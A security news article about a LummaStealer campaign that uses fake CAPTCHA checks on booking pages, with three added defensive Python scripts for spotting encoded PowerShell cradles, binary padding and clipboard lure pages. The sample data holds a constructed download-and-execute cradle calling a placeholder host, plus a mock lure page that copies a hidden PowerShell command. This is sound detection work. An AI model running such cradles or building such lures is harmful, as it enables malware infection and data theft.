Sophisticated Attack Via Booking Websites Installs LummaStealer Malware

Cybercriminals have launched a new, sophisticated attack campaign targeting travelers through fake booking websites.
The campaign, discovered in early 2025, tricks users into installing LummaStealer malware through deceptive CAPTCHA verification processes, putting personal and financial information at risk.
The attack begins when unsuspecting victims visit what appears to be a legitimate booking confirmation page.
Before viewing their booking details, users encounter a CAPTCHA verification that requires them to click an “I’m not a robot” checkbox.
Unlike legitimate CAPTCHA systems, this fraudulent verification instructs users to open their Windows Run command and paste a pre-copied command.
G Data analysts identified that this attack initially targeted travelers booking trips to Palawan, Philippines, but later shifted to targeting hotel bookings in Munich, Germany, indicating a global campaign.
The researchers noted this represents a significant change in LummaStealer’s distribution strategy, which previously relied primarily on GitHub or Telegram channels.
When users follow the deceptive instructions, they unknowingly execute a PowerShell command that initiates the infection chain.
The command runs a Base64-encoded script that downloads the LummaStealer payload from the attacker’s server and executes it on the victim’s system; because the victim launches the command themselves, the chain sidesteps security controls that key on exploit-driven or automated execution.
The entire infection chain consists of four distinct stages that ultimately lead to the installation of LummaStealer, an information-stealing malware operating under a Malware-as-a-Service model.
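From a detection standpoint, the distinctive artifact of this "paste it into Run" chain is a PowerShell process spawned by the user's shell (explorer.exe) with a Base64 -EncodedCommand that decodes to a download-and-execute cradle. The script below is an added example, not code from the article or from G DATA: it decodes the UTF-16LE Base64 payload that PowerShell expects, scores the decoded text for cradle indicators, and weights the explorer.exe parent. The event format, the marker list, the thresholds and the sample events (including the placeholder.invalid host) are constructed for the example.

```python
import base64
import re

# Substrings typical of a stage-one cradle: fetch a remote script and run it in memory.
CRADLE_MARKERS = (
    "invoke-expression", "iex", "downloadstring", "downloadfile",
    "invoke-webrequest", "iwr", "net.webclient", "frombase64string",
    "start-process", "http://", "https://",
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so the switch is matched by prefix and then checked against the full option name.
_ENC_SWITCH = re.compile(r"(?i)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand text, or None if the switch is absent or the blob is invalid."""
    for m in _ENC_SWITCH.finditer(cmdline):
        switch, blob = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(switch):
            continue  # -ep bypass, -ExecutionPolicy ..., -exec ... are not the encoded-command switch
        try:
            # -EncodedCommand is Base64 over UTF-16LE, not UTF-8
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def analyze_process_event(line: str) -> dict:
    """Score one process-creation event in the constructed 'Key=Value|Key=Value' format."""
    fields = dict(kv.split("=", 1) for kv in line.strip().split("|"))
    cmd = fields.get("CommandLine", "")
    parent = fields.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    decoded = decode_encoded_command(cmd)
    hits = [k for k in CRADLE_MARKERS if decoded and k in decoded.lower()]

    score = 0
    if decoded is not None:
        score += 1                      # encoded command at all: worth a look
    if hits:
        score += 2                      # decoded text contains a download/execute cradle
    if parent == "explorer.exe" and decoded is not None:
        score += 2                      # launched from the shell, e.g. via the Run dialog
    if re.search(r"(?i)-w(?:indowstyle)?\s+h(?:idden)?", cmd):
        score += 1                      # hidden window: the victim is not meant to see it
    verdict = "suspicious" if score >= 4 else "review" if score >= 1 else "benign"
    return {"decoded": decoded, "indicators": hits,
            "run_dialog_parent": parent == "explorer.exe", "score": score, "verdict": verdict}


def make_encoded(script: str) -> str:
    """Encode text the way PowerShell expects for -EncodedCommand (Base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events; placeholder.invalid stands in for the attacker's host.
_LURE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage2.ps1')"
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\explorer.exe|Image=" + _PS
    + "|CommandLine=powershell -w hidden -ep bypass -enc " + make_encoded(_LURE_SCRIPT),
    "ParentImage=C:\\Windows\\System32\\cmd.exe|Image=" + _PS
    + "|CommandLine=powershell -ep bypass -File C:\\scripts\\backup.ps1",
    "ParentImage=C:\\Windows\\System32\\services.exe|Image=" + _PS
    + "|CommandLine=powershell -enc " + make_encoded("Get-Date"),
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(analyze_process_event(event))
```

The explorer.exe parent is the part worth keeping in a production rule: scheduled tasks and management agents also run encoded PowerShell, but an interactive shell spawning a hidden, encoded download cradle is rarely legitimate.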
Technical Infection Process
The malware samples collected during the investigation are notably larger than previous versions, increasing by up to 350% (from 2MB to 9MB).
This increase in size serves as an evasion technique known as Binary Padding, where malware authors add junk data to extend file size and potentially avoid detection by security tools.
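Binary Padding is cheap to apply and cheap to measure. The script below is an added example (not from the article or from G DATA) of the check an analyst would run first: parse the PE section table to find where the last section's raw data ends, treat everything after it as overlay, and report the overlay's share of the file and its entropy, since zero-filled or repeated junk sits near 0 bits per byte while real code or compressed data sits near 8. The synthetic PE builder, the 64 KB "code" section and the 256 KB zero overlay are constructed for the example; the sample is not loadable and no real malware sizes are implied.

```python
import math
import random
import struct


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte (0.0 for empty input, ~8.0 for uniformly random bytes)."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in (data.count(v) for v in set(data)))


def end_of_last_section(pe: bytes) -> int:
    """File offset just past the highest section end, read from the PE section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]       # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]  # COFF SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                           # first IMAGE_SECTION_HEADER
    end = 0
    for i in range(nsec):
        # SizeOfRawData and PointerToRawData sit at +16 and +20 in each 40-byte section header
        raw_size, raw_ptr = struct.unpack_from("<II", pe, table + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return end


def assess_padding(pe: bytes, chunk: int = 4096) -> dict:
    """Measure the overlay (bytes past the last section) and flag large, low-entropy padding."""
    end = end_of_last_section(pe)
    overlay = pe[end:]
    ratio = len(overlay) / len(pe)
    chunks = [shannon_entropy(overlay[i:i + chunk]) for i in range(0, len(overlay), chunk)]
    low = sum(1 for e in chunks if e < 1.0)
    return {
        "file_size": len(pe),
        "overlay_size": len(overlay),
        "overlay_ratio": round(ratio, 3),
        "overlay_entropy": round(shannon_entropy(overlay), 3),
        "low_entropy_chunks": low,
        # Installers and signed binaries legitimately carry overlays, so size alone is not
        # enough; junk padding is flagged only when most of the overlay is near-zero entropy.
        "padding_suspected": ratio > 0.5 and bool(chunks) and low / len(chunks) > 0.9,
    }


def build_synthetic_pe(code: bytes, overlay: bytes) -> bytes:
    """Constructed single-section PE with just enough header for the parser; not loadable."""
    hdr = bytearray(0x200)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                    # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader (0 here), Characteristics
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x8664, 1, 0, 0, 0, 0, 0x22)
    # Section header: Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
    # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
    struct.pack_into("<8sIIIIIIHHI", hdr, 0x58, b".text", 0x1000, 0x1000,
                     len(code), 0x200, 0, 0, 0, 0, 0x60000020)
    return bytes(hdr) + code + overlay


# Constructed samples: high-entropy stand-in for code, then a zero-filled overlay.
_rng = random.Random(7)
CODE = _rng.randbytes(64 * 1024)
PADDED_SAMPLE = build_synthetic_pe(CODE, b"\x00" * (256 * 1024))
CLEAN_SAMPLE = build_synthetic_pe(CODE, b"")

if __name__ == "__main__":
    print("padded:", assess_padding(PADDED_SAMPLE))
    print("clean: ", assess_padding(CLEAN_SAMPLE))
```

If the padding is high-entropy (random bytes rather than zeros), the entropy test will not fire; the overlay ratio still will, which is why both numbers are reported rather than a single verdict.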
The malware also employs an obfuscation technique called Indirect Control Flow, which uses Dispatcher Blocks to dynamically calculate target addresses at runtime rather than using direct jumps or calls, making analysis significantly more difficult.
The implementation involves obfuscated PHP scripts encrypted with ROT13 that, when decrypted, reveal JavaScript that copies Base64-encoded commands to the victim’s clipboard.
When executed, these commands download and run the LummaStealer payload, which then harvests sensitive information from the compromised system.
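The lure page itself can be fingerprinted: what the browser receives is JavaScript that writes to the clipboard, next to instructions to open the Run dialog and paste, and the command is usually stored as a Base64 literal. The scanner below is an added example, not code from the article or from G DATA; it checks a page both as-is and after ROT13 (for the server-side PHP described above), decodes `atob(...)` literals so the hidden command is searched too, and reports clipboard-write APIs, Run-dialog lure text and shell hints. The pattern lists, the scoring, the sample lure page and the clean booking form are constructed for the example.

```python
import base64
import codecs
import re

CLIPBOARD_APIS = (
    r"navigator\.clipboard\.writeText",
    r"execCommand\(\s*['\"]copy['\"]\s*\)",
    r"clipboardData\.setData",
)
RUN_LURE = (r"win\s*\+\s*r", r"windows\s*\+\s*r", r"run\s+dialog", r"ctrl\s*\+\s*v", r"i'?m not a robot")
SHELL_HINTS = (r"powershell", r"mshta", r"cmd(?:\.exe)?\s*/c", r"-enc", r"frombase64")

_ATOB_LITERAL = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")


def _hits(text: str, patterns) -> list:
    return [p for p in patterns if re.search(p, text, re.I)]


def _score(result: dict) -> int:
    return len(result["clipboard_write"]) + len(result["run_lure"]) + len(result["shell_hints"])


def scan_lure_page(src: str) -> dict:
    """Classify page source as a fake-CAPTCHA clipboard lure; tries the raw text and its ROT13 form."""
    best = None
    for variant, text in (("plain", src), ("rot13", codecs.decode(src, "rot_13"))):
        haystack = text
        # The copied command is often a Base64 literal; decode it so shell hints inside it count.
        for m in _ATOB_LITERAL.finditer(text):
            try:
                haystack += " " + base64.b64decode(m.group(1), validate=True).decode("utf-8", "ignore")
            except ValueError:
                pass
        result = {
            "variant": variant,
            "clipboard_write": _hits(haystack, CLIPBOARD_APIS),
            "run_lure": _hits(haystack, RUN_LURE),
            "shell_hints": _hits(haystack, SHELL_HINTS),
        }
        # Clipboard writes are common on legitimate pages (copy buttons); the verdict needs
        # the write paired with paste-into-Run instructions or a shell command.
        if result["clipboard_write"] and (result["run_lure"] or result["shell_hints"]):
            result["verdict"] = "fake-captcha lure"
        elif result["clipboard_write"]:
            result["verdict"] = "clipboard use, review"
        else:
            result["verdict"] = "benign"
        if best is None or _score(result) > _score(best):
            best = result
    return best


# Constructed sample lure page; the copied command uses a PLACEHOLDER blob, not a real payload.
_COPIED = base64.b64encode(b"powershell -w hidden -enc PLACEHOLDER").decode("ascii")
SAMPLE_PAGE = """<div class="captcha">
<label><input type="checkbox"> I'm not a robot</label>
<p class="steps">Step 1: Press Win + R. Step 2: Press Ctrl + V and Enter.</p>
<script>
document.querySelector('input').onclick = function () {
  navigator.clipboard.writeText(atob('%s'));
};
</script></div>""" % _COPIED

# Constructed clean page: a normal checkbox form with no clipboard access.
CLEAN_PAGE = """<form><label><input type="checkbox" name="human"> I'm not a robot</label>
<button type="submit">Continue to booking</button></form>"""

if __name__ == "__main__":
    print(scan_lure_page(SAMPLE_PAGE))
    print(scan_lure_page(codecs.decode(SAMPLE_PAGE, "rot_13")))
    print(scan_lure_page(CLEAN_PAGE))
```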
Security researchers expect LummaStealer attacks to continue increasing in the coming months as attackers refine their social engineering techniques to exploit travelers seeking online booking services.